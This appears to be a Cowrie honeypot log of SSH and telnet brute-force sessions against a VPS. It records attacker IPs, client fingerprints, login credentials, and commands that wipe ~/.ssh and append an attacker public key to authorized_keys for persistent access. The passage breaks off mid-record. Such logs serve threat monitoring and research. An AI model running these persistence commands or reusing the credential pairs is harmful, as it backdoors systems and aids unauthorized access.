{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":52782,"dst_ip":"1.2.3.4","dst_port":22,"session":"e58f2c354385","protocol":"ssh","message":"New connection: 217.72.205.35:52782 (1.2.3.4:22) [session: e58f2c354385]","sensor":"my-vps","timestamp":"2025-08-26T03:44:18.205427Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:18.206576Z","src_ip":"217.72.205.35","session":"e58f2c354385"}
{"eventid":"cowrie.session.connect","src_ip":"8.213.197.49","src_port":42888,"dst_ip":"1.2.3.4","dst_port":22,"session":"7575040386bc","protocol":"ssh","message":"New connection: 8.213.197.49:42888 (1.2.3.4:22) [session: 7575040386bc]","sensor":"my-vps","timestamp":"2025-08-26T03:44:36.076594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:44:36.077577Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:44:36.283373Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa1234567.","message":"login attempt [root/Aa1234567.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:44:37.149374Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:44:37.615534Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:44:37.616211Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:44:37.617131Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:37.823998Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:44:38.254753Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.255684Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.464764Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.465951Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.session.connect","src_ip":"8.213.197.49","src_port":38150,"dst_ip":"1.2.3.4","dst_port":22,"session":"fec7c1439f23","protocol":"ssh","message":"New connection: 8.213.197.49:38150 (1.2.3.4:22) [session: fec7c1439f23]","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.671453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.672604Z","src_ip":"8.213.197.49","session":"fec7c1439f23"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:44:38.879599Z","src_ip":"8.213.197.49","session":"fec7c1439f23"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:44:39.750935Z","src_ip":"8.213.197.49","session":"fec7c1439f23"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:40.960433Z","src_ip":"8.213.197.49","session":"fec7c1439f23"}
{"eventid":"cowrie.session.connect","src_ip":"8.213.197.49","src_port":38728,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d6a04429294","protocol":"ssh","message":"New connection: 8.213.197.49:38728 (1.2.3.4:22) [session: 1d6a04429294]","sensor":"my-vps","timestamp":"2025-08-26T03:44:41.162916Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:44:41.163860Z","src_ip":"8.213.197.49","session":"1d6a04429294"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:44:41.370357Z","src_ip":"8.213.197.49","session":"1d6a04429294"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:44:42.235370Z","src_ip":"8.213.197.49","session":"1d6a04429294"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:42.443011Z","src_ip":"8.213.197.49","session":"1d6a04429294"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:44:42.444400Z","src_ip":"8.213.197.49","session":"7575040386bc"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":52665,"dst_ip":"1.2.3.4","dst_port":23,"session":"41a75a14fec8","protocol":"telnet","message":"New connection: 182.119.161.105:52665 (1.2.3.4:23) [session: 41a75a14fec8]","sensor":"my-vps","timestamp":"2025-08-26T03:44:54.415925Z"}
{"eventid":"cowrie.session.closed","duration":12.67702579498291,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:07.092875Z","src_ip":"182.119.161.105","session":"41a75a14fec8"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":52969,"dst_ip":"1.2.3.4","dst_port":23,"session":"c6b7ccfb70c4","protocol":"telnet","message":"New connection: 182.119.161.105:52969 (1.2.3.4:23) [session: c6b7ccfb70c4]","sensor":"my-vps","timestamp":"2025-08-26T03:45:07.286460Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47654,"dst_ip":"1.2.3.4","dst_port":22,"session":"da1e8164994b","protocol":"ssh","message":"New connection: 212.227.235.229:47654 (1.2.3.4:22) [session: da1e8164994b]","sensor":"my-vps","timestamp":"2025-08-26T03:45:08.037184Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:08.038077Z","src_ip":"212.227.235.229","session":"da1e8164994b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:08.989054Z","src_ip":"212.227.235.229","session":"da1e8164994b"}
{"eventid":"cowrie.login.success","username":"root","password":"Li123456","message":"login attempt [root/Li123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:45:12.987951Z","src_ip":"212.227.235.229","session":"da1e8164994b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34516,"dst_ip":"1.2.3.4","dst_port":22,"session":"5bb63a27f111","protocol":"ssh","message":"New connection: 212.227.235.229:34516 (1.2.3.4:22) [session: 5bb63a27f111]","sensor":"my-vps","timestamp":"2025-08-26T03:45:16.114471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:16.115378Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:19.562654Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.session.closed","duration":12.811918020248413,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:20.098307Z","src_ip":"182.119.161.105","session":"c6b7ccfb70c4"}
{"eventid":"cowrie.login.success","username":"root","password":"1234@abcd","message":"login attempt [root/1234@abcd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T03:45:20.306321Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.session.connect","src_ip":"182.119.161.105","src_port":53280,"dst_ip":"1.2.3.4","dst_port":23,"session":"49fae4a5ebcf","protocol":"telnet","message":"New connection: 182.119.161.105:53280 (1.2.3.4:23) [session: 49fae4a5ebcf]","sensor":"my-vps","timestamp":"2025-08-26T03:45:20.397680Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:45:20.853797Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:45:20.854603Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T03:45:20.855644Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:21.104025Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T03:45:21.616825Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T03:45:21.617531Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T03:45:21.866521Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:21.867482Z","src_ip":"212.227.235.229","session":"5bb63a27f111"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55790,"dst_ip":"1.2.3.4","dst_port":22,"session":"1fbb426a60b7","protocol":"ssh","message":"New connection: 212.227.235.229:55790 (1.2.3.4:22) [session: 1fbb426a60b7]","sensor":"my-vps","timestamp":"2025-08-26T03:45:22.111927Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:22.112736Z","src_ip":"212.227.235.229","session":"1fbb426a60b7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T03:45:23.330656Z","src_ip":"212.227.235.229","session":"1fbb426a60b7"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T03:45:24.071303Z","src_ip":"212.227.235.229","session":"1fbb426a60b7"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T03:45:25.319735Z","src_ip":"212.227.235.229","session":"1fbb426a60b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55798,"dst_ip":"1.2.3.4","dst_port":22,"session":"dc3ac3b8e4da","protocol":"ssh","message":"New connection: 212.227.235.229:55798 (1.2.3.4:22) [session: dc3ac3b8e4da]","sensor":"my-vps","timestamp":"2025-08-26T03:45:25.573224Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T03:45:25.574174Z","src_ip":"212.227.235.229","session":"dc3ac3b8e4da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 